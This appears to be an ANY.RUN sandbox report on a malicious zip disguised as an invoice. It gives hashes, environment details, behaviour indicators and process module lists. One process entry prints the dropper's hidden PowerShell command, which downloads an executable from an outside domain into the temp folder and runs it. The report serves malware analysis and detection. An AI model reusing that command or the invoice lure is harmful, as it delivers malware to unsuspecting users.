General Info

File name

SignIQ Pty Ltd invoice 127.zip

Full analysis
https://app.any.run/tasks/b304f663-902a-4dfc-8b1b-de104af5bb5d
Verdict
Malicious activity
Analysis date
4/15/2019, 10:44:02
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:

loader

Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v2.0 to extract
MD5

1237ae60f76b5aecb8eb9fc55a858002

SHA1

3ce266baa2e645e85b01eb3cede10ffc4c15be84

SHA256

024b3cb1633de1603168d69af457ab313b56f9d609df46bed4389a74d243e907

SSDEEP

384:hryL7K2HYhSO4zre7SGTx7pv1MENKWfr+Lk3X8lfQc0yKj+pKZkJva:4L7bHYwO4wQq3TFlc+C0ZkY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
485 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
on
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 11.0.9600.18860 KB4052978
  • Adobe Acrobat Reader DC MUI (15.007.20033)
  • Adobe Flash Player 27 ActiveX (27.0.0.187)
  • Adobe Flash Player 27 NPAPI (27.0.0.187)
  • Adobe Flash Player 27 PPAPI (27.0.0.187)
  • CCleaner (5.35)
  • Google Chrome (73.0.3683.86)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (64-bit) (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Professional 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Office Single Image 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
  • Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
  • Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
  • Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
  • Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (14.12.25810.0)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.11.25325 (14.11.25325.0)
  • Microsoft Visual C++ 2017 x64 Additional Runtime - 14.12.25810 (14.12.25810)
  • Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.12.25810 (14.12.25810)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.11.25325 (14.11.25325)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.11.25325 (14.11.25325)
  • Mozilla Firefox 65.0.2 (x64 en-US) (65.0.2)
  • Mozilla Maintenance Service (65.0.2)
  • Notepad++ (64-bit x64) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype™ 7.39 (7.39.102)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (64-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Hyphenation Parent Package English
  • IE Spelling Parent Package English
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • InternetExplorer Package TopLevel
  • KB2479943
  • KB2491683
  • KB2506014
  • KB2506212
  • KB2506928
  • KB2509553
  • KB2532531
  • KB2533552
  • KB2534111
  • KB2545698
  • KB2547666
  • KB2552343
  • KB2560656
  • KB2563227
  • KB2564958
  • KB2579686
  • KB2585542
  • KB2585542 SP1
  • KB2598845
  • KB2603229
  • KB2604115
  • KB2620704
  • KB2621440
  • KB2631813
  • KB2640148
  • KB2653956
  • KB2654428
  • KB2656356
  • KB2656356 SP1
  • KB2660075
  • KB2667402
  • KB2685811
  • KB2685813
  • KB2685939
  • KB2690533
  • KB2698365
  • KB2705219
  • KB2706045
  • KB2719857
  • KB2726535
  • KB2727528
  • KB2729094
  • KB2729452
  • KB2732059
  • KB2732487
  • KB2736422
  • KB2742599
  • KB2750841
  • KB2758857
  • KB2761217
  • KB2763523
  • KB2770660
  • KB2773072
  • KB2786081
  • KB2789645
  • KB2789645 SP1
  • KB2791765
  • KB2799926
  • KB2800095
  • KB2807986
  • KB2808679
  • KB2813430
  • KB2834140
  • KB2836942
  • KB2836943
  • KB2840631
  • KB2843630
  • KB2847927
  • KB2852386
  • KB2853952
  • KB2861698
  • KB2862152
  • KB2862330
  • KB2862335
  • KB2864202
  • KB2868038
  • KB2871997
  • KB2884256
  • KB2888049
  • KB2891804
  • KB2892074
  • KB2893294
  • KB2893519
  • KB2894844
  • KB2900986
  • KB2908783
  • KB2911501
  • KB2912390
  • KB2918077
  • KB2919469
  • KB2931356
  • KB2937610
  • KB2943357
  • KB2952664
  • KB2966583
  • KB2968294
  • KB2970228
  • KB2972100
  • KB2972211
  • KB2973112
  • KB2973201
  • KB2973351
  • KB2977292
  • KB2978120
  • KB2978742
  • KB2984972
  • KB2985461
  • KB2991963
  • KB2992611
  • KB3003743
  • KB3004361
  • KB3004375
  • KB3006121
  • KB3006137
  • KB3010788
  • KB3011780
  • KB3013531
  • KB3019978
  • KB3020370
  • KB3021674
  • KB3021917
  • KB3022777
  • KB3023215
  • KB3030377
  • KB3031432
  • KB3035126
  • KB3035132
  • KB3037574
  • KB3042058
  • KB3045685
  • KB3046017
  • KB3046269
  • KB3054476
  • KB3055642
  • KB3059317
  • KB3060716
  • KB3067903
  • KB3068708
  • KB3071756
  • KB3072305
  • KB3074543
  • KB3075220
  • KB3076895
  • KB3078601
  • KB3078667
  • KB3080149
  • KB3084135
  • KB3086255
  • KB3092601
  • KB3092627
  • KB3093513
  • KB3097989
  • KB3101722
  • KB3107998
  • KB3108371
  • KB3108381
  • KB3108664
  • KB3109103
  • KB3109560
  • KB3110329
  • KB3115858
  • KB3115858 SP1
  • KB3122648
  • KB3124275
  • KB3126587
  • KB3127220
  • KB3133977
  • KB3137061
  • KB3138378
  • KB3138612
  • KB3138910
  • KB3139398
  • KB3139914
  • KB3140245
  • KB3147071
  • KB3150220
  • KB3155178
  • KB3156016
  • KB3156019
  • KB3159398
  • KB3161102
  • KB3161949
  • KB3161958
  • KB3170735
  • KB3170735 SP1
  • KB3172605
  • KB3177467
  • KB3179573
  • KB3184143
  • KB4019990
  • KB4040980
  • KB976902
  • KB982018
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • Package 1 for KB2656356
  • Package 1 for KB2789645
  • Package 1 for KB3115858
  • Package 1 for KB3170735
  • Package 2 for KB2585542
  • Package 2 for KB2656356
  • Package 2 for KB2789645
  • Package 2 for KB3115858
  • Package 2 for KB3170735
  • Package 3 for KB2585542
  • Package 3 for KB2656356
  • Package 4 for KB2656356
  • Package 4 for KB2789645
  • Package 5 for KB2656356
  • Package 7 for KB2656356
  • PlatformUpdate Win7 SRV08R2 Package TopLevel
  • ProfessionalEdition
  • RollupFix
  • UltimateEdition
  • WUClient SelfUpdate ActiveX
  • WUClient SelfUpdate Aux TopLevel
  • WUClient SelfUpdate Core TopLevel

Behavior activities

MALICIOUS SUSPICIOUS INFO
Changes settings of System certificates
  • dVjiJafHlc.exe (PID: 1628)
Application was dropped or rewritten from another process
  • dVjiJafHlc.exe (PID: 1628)
Reads the machine GUID from the registry
  • WinRAR.exe (PID: 2856)
  • WScript.exe (PID: 2384)
  • powershell.exe (PID: 2592)
Executes PowerShell scripts
  • WScript.exe (PID: 2384)
Creates files in the user directory
  • powershell.exe (PID: 2592)
Reads the machine GUID from the registry
  • iexplore.exe (PID: 652)
  • iexplore.exe (PID: 908)
  • iexplore.exe (PID: 2488)
  • iexplore.exe (PID: 2728)
  • iexplore.exe (PID: 2136)
Reads internet explorer settings
  • IEXPLORE.EXE (PID: 2752)
  • IEXPLORE.EXE (PID: 1904)
  • IEXPLORE.EXE (PID: 1892)
  • IEXPLORE.EXE (PID: 2800)
  • IEXPLORE.EXE (PID: 2912)
Reads settings of System Certificates
  • iexplore.exe (PID: 2136)
Changes internet zones settings
  • iexplore.exe (PID: 652)
  • iexplore.exe (PID: 2488)
  • iexplore.exe (PID: 908)
  • iexplore.exe (PID: 2728)
  • iexplore.exe (PID: 2136)
Reads Internet Cache Settings
  • iexplore.exe (PID: 2488)
  • iexplore.exe (PID: 652)
  • iexplore.exe (PID: 908)
  • iexplore.exe (PID: 2728)
  • iexplore.exe (PID: 2136)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
null
ZipCompression:
Deflated
ZipModifyDate:
2019:04:15 00:29:05
ZipCRC:
0x98232722
ZipCompressedSize:
18326
ZipUncompressedSize:
69345
ZipFileName:
SignIQ Pty Ltd invoice 127.vbs

Video and screenshots

Processes

Total processes
50
Monitored processes
14
Malicious processes
0
Suspicious processes
1

Behavior graph

+
start winrar.exe no specs wscript.exe no specs powershell.exe no specs dvjijafhlc.exe iexplore.exe iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2856
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\SignIQ Pty Ltd invoice 127.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_145eb2808b8d6928\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\wshext.dll
c:\windows\system32\wscript.exe
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID
2384
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\SignIQ Pty Ltd invoice 127.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\system\ado\msado15.dll
c:\windows\system32\msdart.dll
c:\windows\system32\mlang.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll

PID
2592
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -exec bypass -nop if($host.version.major -lt 3){Import-Module BitsTransfer} Start-BitsTransfer -Source https://saintsandsinnersbar.com/duplicate/answear.xls -Destination $env:temp\dVjiJafHlc.exe; Start-Process $env:temp\dVjiJafHlc.exe
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\fabca41dc6cc22a902c2525408b49ab9\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management.a#\d5ab9ebdfc2bacea66210c16fff703d2\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.core\2706ddbd765b8a111d3083f8af88ef03\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\326a4488a1881b3bd8ea1e8f4dd7420f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuratio#\1e9190c7a12053ea715c8d8ef8faddd1\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.wsman.man#\23314086651ff4d13264ef3cd19e0b4e\microsoft.wsman.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.transactions\9354030849f9e58d9b95d32149f7bb68\system.transactions.ni.dll
c:\windows\assembly\gac_64\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\2e6ebcf758bbffd55f7abfd8878c72c1\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\7c10a24ff552941b03414d424169041f\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\89738d6a75ab575f400360d0670f60ed\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management\38c49b707af17308185a48479fcb7404\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.directoryser#\543de12ce97f16746b85981a80878035\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.data\2276c85b65e1f517da1b9026640e2a55\system.data.ni.dll
c:\windows\assembly\gac_64\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\windowspowershell\v1.0\modules\bitstransfer\microsoft.backgroundintelligenttransfer.management.interop.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qmgrprxy.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\netutils.dll

PID
1628
CMD
"C:\Users\admin\AppData\Local\Temp\dVjiJafHlc.exe"
Path
C:\Users\admin\AppData\Local\Temp\dVjiJafHlc.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
INCA Internet Co., Ltd.
Description
nProtect KeyCrypt Program Database DLL
Version
2003, 10, 1, 1
Modules
Image
c:\users\admin\appdata\local\temp\dvjijafhlc.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\lz32.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\syswow64\winspool.drv
c:\windows\syswow64\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\clbcatq.dll
c:\windows\syswow64\wbem\wbemprox.dll
c:\windows\syswow64\wbemcomn.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\wbem\wbemsvc.dll
c:\windows\syswow64\wbem\fastprox.dll
c:\windows\syswow64\ntdsapi.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\gpapi.dll

PID
2136
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
